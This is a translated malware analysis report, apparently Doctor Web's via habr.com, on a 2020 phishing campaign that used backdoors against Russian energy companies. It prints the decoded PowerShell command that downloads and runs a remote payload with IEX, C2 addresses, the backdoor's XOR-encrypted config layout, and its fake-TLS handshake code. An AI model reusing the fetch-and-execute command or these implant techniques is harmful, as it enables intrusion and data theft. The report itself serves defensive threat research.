Naše iskustvo u istraživanju incidenata u kompjuterskoj sigurnosti pokazuje da je e-pošta još uvijek jedan od najčešćih kanala koje napadači koriste za inicijalno prodor u napadnutu mrežnu infrastrukturu. Jedna neoprezna akcija sa sumnjivim (ili ne tako sumnjivim) pismom postaje ulazna tačka za dalju infekciju, zbog čega sajber kriminalci aktivno koriste metode društvenog inženjeringa, iako sa različitim stepenom uspeha.
U ovom postu želimo da razgovaramo o našoj nedavnoj istrazi o spam kampanji koja cilja brojna preduzeća u ruskom kompleksu goriva i energije. Svi napadi su se odvijali po istom scenariju koristeći lažne mejlove, a činilo se da niko nije uložio mnogo truda u tekstualni sadržaj ovih mejlova.
Obavještajna služba
Sve je počelo krajem aprila 2020. godine, kada su analitičari virusa Doctor Web otkrili spam kampanju u kojoj su hakeri poslali ažurirani telefonski imenik zaposlenima brojnih preduzeća u ruskom energetsko-energetskom kompleksu. Naravno, ovo nije bio jednostavan iskaz zabrinutosti, jer direktorij nije bio stvaran, a .docx dokumenti su preuzeli dvije slike sa udaljenih izvora.
Jedan od njih je preuzet na računar korisnika sa servera news[.]zannews[.]com. Važno je napomenuti da je naziv domene sličan domenu antikorupcijskog medijskog centra Kazahstana - zannews[.]kz. S druge strane, korišteni domen je odmah podsjećao na još jednu kampanju iz 2015. godine poznatu kao TOPNEWS, koja je koristila ICEFOG backdoor i imala trojanske kontrolne domene sa podnizom “vijesti” u njihovim nazivima. Još jedna zanimljiva karakteristika je da prilikom slanja e-pošte različitim primateljima, zahtjevi za preuzimanje slike koriste različite parametre zahtjeva ili jedinstvena imena slika.
Vjerujemo da je to učinjeno u svrhu prikupljanja informacija za identifikaciju “pouzdanog” primaoca, koji bi tada bio zagarantovan da otvori pismo u pravo vrijeme. Za preuzimanje slike sa drugog servera korišćen je SMB protokol, što je moglo da se uradi za prikupljanje NetNTLM heševa sa računara zaposlenih koji su otvorili primljeni dokument.
A evo i samog pisma s lažnim imenikom:
U junu ove godine, hakeri su počeli koristiti novi naziv domene, sports[.]manhajnews[.]com, za postavljanje slika. Analiza je pokazala da se poddomene manhajnews[.]com koriste za slanje neželjene pošte najmanje od septembra 2019. godine. Jedna od meta ove kampanje bio je veliki ruski univerzitet.
Također, do juna, organizatori napada osmislili su novi tekst za svoja pisma: ovaj put dokument je sadržavao informacije o razvoju industrije. Tekst pisma jasno je ukazivao da njegov autor ili nije izvorni govornik ruskog, ili je namjerno stvarao takav utisak o sebi. Nažalost, ideje razvoja industrije su se, kao i uvijek, ispostavile samo kao pokriće - dokument je ponovo preuzeo dvije slike, dok je server promijenjen u download[.]inklingpaper[.]com.
Sljedeća inovacija uslijedila je u julu. U pokušaju da zaobiđu otkrivanje zlonamjernih dokumenata od strane antivirusnih programa, napadači su počeli koristiti Microsoft Word dokumente šifrirane lozinkom. Istovremeno, napadači su odlučili da koriste klasičnu tehniku socijalnog inženjeringa – obaveštenje o nagradi.
Tekst žalbe je ponovo napisan u istom stilu, što je kod adresata izazvalo dodatnu sumnju. Server za preuzimanje slike takođe se nije promenio.
Imajte na umu da su u svim slučajevima elektronski sandučići registrovani na domenima mail[.]ru i yandex[.]ru korišteni za slanje pisama.
Napad
Početkom septembra 2020. bilo je vrijeme za akciju. Naši virusni analitičari zabilježili su novi val napada u kojima su napadači ponovo slali pisma pod izgovorom ažuriranja telefonskog imenika. Međutim, ovaj put je prilog sadržavao zlonamjerni makro.
Prilikom otvaranja priloženog dokumenta, makro je kreirao dvije datoteke:
- VBS skripta %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, koja je bila namijenjena za pokretanje batch datoteke;
- Sama batch datoteka %APPDATA%configstest.bat, koja je bila zamagljena.
Suština njegovog rada svodi se na pokretanje Powershell ljuske sa određenim parametrima. Parametri proslijeđeni ljusci se dekodiraju u naredbe:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Kao što slijedi iz predstavljenih naredbi, domena s koje se preuzima korisni teret ponovo je prikrivena kao web stranica s vijestima. Jednostavan , čiji je jedini zadatak da primi shellcode od komandnog i kontrolnog servera i izvrši ga. Uspjeli smo identificirati dvije vrste backdoor-a koji se mogu instalirati na žrtvin PC.
BackDoor.Siggen2.3238
Prvi je BackDoor.Siggen2.3238 — naši stručnjaci se ranije nisu susreli, a ni drugi proizvođači antivirusa nisu spominjali ovaj program.
Ovaj program je backdoor napisan u C++ i radi na 32-bitnim Windows operativnim sistemima.
BackDoor.Siggen2.3238 može komunicirati sa serverom za upravljanje koristeći dva protokola: HTTP i HTTPS. Testirani uzorak koristi HTTPS protokol. Sljedeći korisnički agent se koristi u zahtjevima prema serveru:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
U ovom slučaju, svi zahtjevi se isporučuju sa sljedećim skupom parametara:
%s;type=%s;length=%s;realdata=%send
gdje je svaki red %s na odgovarajući način zamijenjen sa:
- ID zaraženog računara,
- vrsta zahtjeva koji se šalje,
- dužina podataka u polju realnih podataka,
- podataka.
U fazi prikupljanja informacija o zaraženom sistemu, backdoor generiše liniju poput:
lan=%s;cmpname=%s;username=%s;version=%s;
gde je lan IP adresa zaraženog računara, cmpname je ime računara, korisničko ime je korisničko ime, verzija je red 0.0.4.03.
Ove informacije sa sysinfo identifikatorom se šalju putem POST zahtjeva kontrolnom serveru koji se nalazi na https[:]//31.214[.]157.14/log.txt. Ako u odgovoru BackDoor.Siggen2.3238 primi signal HEART, veza se smatra uspješnom, a backdoor započinje glavni ciklus komunikacije sa serverom.
Potpuniji opis principa rada BackDoor.Siggen2.3238 je u našoj .
BackDoor.Whitebird.23
Drugi program je modifikacija backdoor-a BackDoor.Whitebird, koji nam je već poznat iz incidenta sa vladinom agencijom u Kazahstanu. Ova verzija je napisana na C++ i dizajnirana je za rad na 32-bitnim i 64-bitnim Windows operativnim sistemima.
Kao i većina programa ovog tipa, BackDoor.Whitebird.23 dizajniran za uspostavljanje šifrovane veze sa kontrolnim serverom i neovlašćenu kontrolu zaraženog računara. Instaliran u kompromitovani sistem pomoću kapaljke .
Uzorak koji smo ispitali je zlonamjerna biblioteka sa dva izvoza:
- Google Play
- Test.
Na početku svog rada, dešifrira konfiguraciju ugrađenu u backdoor tijelo koristeći algoritam baziran na operaciji XOR sa bajtom 0x99. Konfiguracija izgleda ovako:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Da bi osigurao svoj stalni rad, backdoor mijenja vrijednost navedenu u polju radni sati konfiguracije. Polje sadrži 1440 bajtova, koji uzimaju vrijednosti 0 ili 1 i predstavljaju svaku minutu svakog sata u danu. Kreira zasebnu nit za svaki mrežni interfejs koji sluša interfejs i traži autorizacione pakete na proxy serveru sa zaraženog računara. Kada se takav paket otkrije, backdoor dodaje informacije o proxy serveru na svoju listu. Osim toga, provjerava prisutnost proxyja putem WinAPI-ja InternetQueryOptionW.
Program provjerava trenutne minute i satove i upoređuje ih sa podacima na terenu radni sati konfiguracije. Ako vrijednost za odgovarajući minut dana nije nula, tada se uspostavlja veza sa kontrolnim serverom.
Uspostavljanje veze sa serverom simulira kreiranje veze pomoću TLS protokola verzije 1.0 između klijenta i servera. Tijelo stražnjih vrata sadrži dva bafera.
Prvi bafer sadrži TLS 1.0 Client Hello paket.
Drugi bafer sadrži TLS 1.0 Client Key Exchange pakete sa dužinom ključa od 0x100 bajtova, Change Cipher Spec, Encrypted Handshake Message.
Prilikom slanja Client Hello paketa, backdoor upisuje 4 bajta trenutnog vremena i 28 bajtova pseudo-slučajnih podataka u Client Random polje, izračunato na sljedeći način:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Primljeni paket se šalje kontrolnom serveru. Odgovor (Server Hello paket) provjerava:
- usklađenost sa TLS protokolom verzije 1.0;
- korespondencija vremenske oznake (prva 4 bajta polja Random Data packet) koju je odredio klijent sa vremenskom oznakom koju je specificirao server;
- podudaranje prva 4 bajta nakon vremenske oznake u polju Random Data klijenta i servera.
U slučaju navedenih podudaranja, backdoor priprema paket za razmjenu ključeva klijenta. Da bi to uradio, modifikuje javni ključ u paketu za razmenu ključeva klijenta, kao i enkripciju IV i podatke šifrovanja u paketu šifrovane poruke rukovanja.
Backdoor zatim prima paket od komandnog i kontrolnog servera, provjerava da li je verzija TLS protokola 1.0, a zatim prihvata još 54 bajta (tijelo paketa). Ovo dovršava postavljanje veze.
Potpuniji opis principa rada BackDoor.Whitebird.23 je u našoj .
Zaključak i zaključci
Analiza dokumenata, zlonamjernog softvera i korištene infrastrukture nam omogućava da sa sigurnošću kažemo da je napad pripremila jedna od kineskih APT grupa. S obzirom na funkcionalnost backdoor-a koji se instaliraju na računare žrtava u slučaju uspješnog napada, infekcija dovodi, u najmanju ruku, do krađe povjerljivih informacija sa računara napadnutih organizacija.
Osim toga, vrlo vjerojatan scenarij je instalacija specijaliziranih trojanaca na lokalne servere sa posebnom funkcijom. To mogu biti kontroleri domena, serveri pošte, Internet pristupnici, itd. Kao što smo mogli vidjeti u primjeru , takvi serveri su od posebnog interesa za napadače iz različitih razloga.
izvor: www.habr.com